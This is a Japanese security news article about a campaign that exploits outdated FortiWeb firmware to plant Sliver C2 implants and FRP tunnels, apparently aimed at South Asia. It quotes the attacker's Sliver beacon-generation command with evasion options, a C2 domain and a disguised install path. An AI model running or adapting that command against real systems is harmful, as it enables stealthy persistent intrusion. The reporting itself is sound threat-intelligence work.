FortiWeb アプライアンスの旧モデルを悪用:Sliver C2 を展開する持続型キャンペーンを検出

Threat Actor Exploited Multiple FortiWeb Appliances to Deploy Sliver C2 for Persistent Access

2026/01/05 CyberSecurityNews — 高度な技術を有する脅威アクターが FortiWeb アプライアンスの旧モデルを悪用し、Sliver C2 (Command and Control) フレームワークを展開している実態が、最近の調査により明らかになった。この攻撃キャンペーンを展開する攻撃者は、オープンソースの攻撃ツールを用いて侵害したネットワーク内に持続的なアクセスを確立し、従来のセキュリティ防御を回避するという、懸念すべき傾向を浮き彫りにしている。特に、パッチが適用されていないエッジデバイスが優先的に狙われ、広範なネットワーク侵入のための、安定した足掛かりとして悪用されている。

この感染プロセスの主体は、FortiWeb デバイスに存在する既知の脆弱性の悪用によるものであり、ファームウェア・バージョン 5.4.202 〜 6.1.62 が標的にされている。FortiWeb 侵害に用いられた脆弱性は正確には特定されていないが、この脅威アクターが React2Shell CVE-2025-55182 を並行して悪用していることが確認されている。

初期アクセスを確立した攻撃者は、Fast Reverse Proxy (FRP) ツールを展開し、ローカル・サービスを外部に公開することで、被害者の内部ネットワークと攻撃者が管理する外部制御システムをダイレクトに接続する。

FRP (Source – Ctrl-Alt-Int3l)

Censys を用いた定期的なオープン・ディレクトリ脅威ハンティングの過程において、Ctrl-Alt-Int3l のアナリストたちが発見したのは、公開状態となっている Sliver C2 のデータベースおよびログであり、それにより、悪意のインフラが特定された。これらの公開資産が示すのは、センタライズされたサーバにビーコン通信を行う、侵害済みのデバイス群の存在であり、攻撃者の運用手法を詳細に把握する手がかりとなった。

Hosts (Source – Ctrl-Alt-Int3l)

分析の結果として確認されたのは、被害を受けたホストの大半が古いファームウェアを使用していること、そして、日和見的でありながら標的を絞った攻撃に対して極めて脆弱であったことだ。通常において、このような攻撃が発生すると、信頼される重要なセキュリティ・アプライアンス内部に、脅威アクターが長期間潜伏する可能性が高まるため、運用上の影響は深刻である。

Sliver インプラントをファイアウォールに直接埋め込む攻撃者は、ネットワーク・トラフィックの監視や、特権コマンドの実行を引き起こす可能性がある。このキャンペーンでは、綿密にテーマ設定されたデコイ・インフラから、南アジアを標的とする兆候が散見されており、明確な戦略的焦点が確認されている。

コマンド&コントロール戦略

脅威アクターのインフラは、正規サービスを模倣するデコイ・ドメインを中心に構築されている。C2 コンフィグの分析により、”ns1.ubunutpackages[.]store” や “ns1.bafairforce[.]army” といったドメインが確認された。

これらのドメインは、”Ubuntu Packages” のリポジトリや、バングラデシュ空軍の募集ページを装う偽コンテンツをホストし、防御側の監視を欺いていた。

そのログから確認されたのは、回避機能を備えたペイロードを生成するために使用された、以下の Sliver コマンドの存在である。

generate beacon –http ns1.ubunutpackages.store –reconnect 120 –strategy r –template ubuntu –os linux –evasion –save ./system-updater –seconds 60

この設定では、ビーコンが 120 秒ごとに再接続し、”ubuntu” テンプレートを用いることで、Linux プロセスに溶け込むよう設計されている。生成されたバイナリは、侵害された FortiWeb デバイス上の “/bin/.root/system-updater” に配置され、正規のシステム・アップデート・ユーティリティを装いながら動作していた。

信頼されるはずの Fortinet デバイスが、攻撃の拠点にされるというインシデントが検出されました。この問題の原因は、古いファームウェアを使い続けることで、すでに判明している既知の脆弱性に対処できなかった点にあります。こうした隙を見逃さない攻撃者は、このエッジデバイスを初期の侵入経路として悪用しました。こうして侵害が成立すると、正規のシステム更新を装う高度なツールが使われてしまうため、異常に気付きにくい状況に陥ります。古いデバイスをご利用のチームは、ご注意ください。よろしければ、Fortinet での検索結果も、ご参照ください。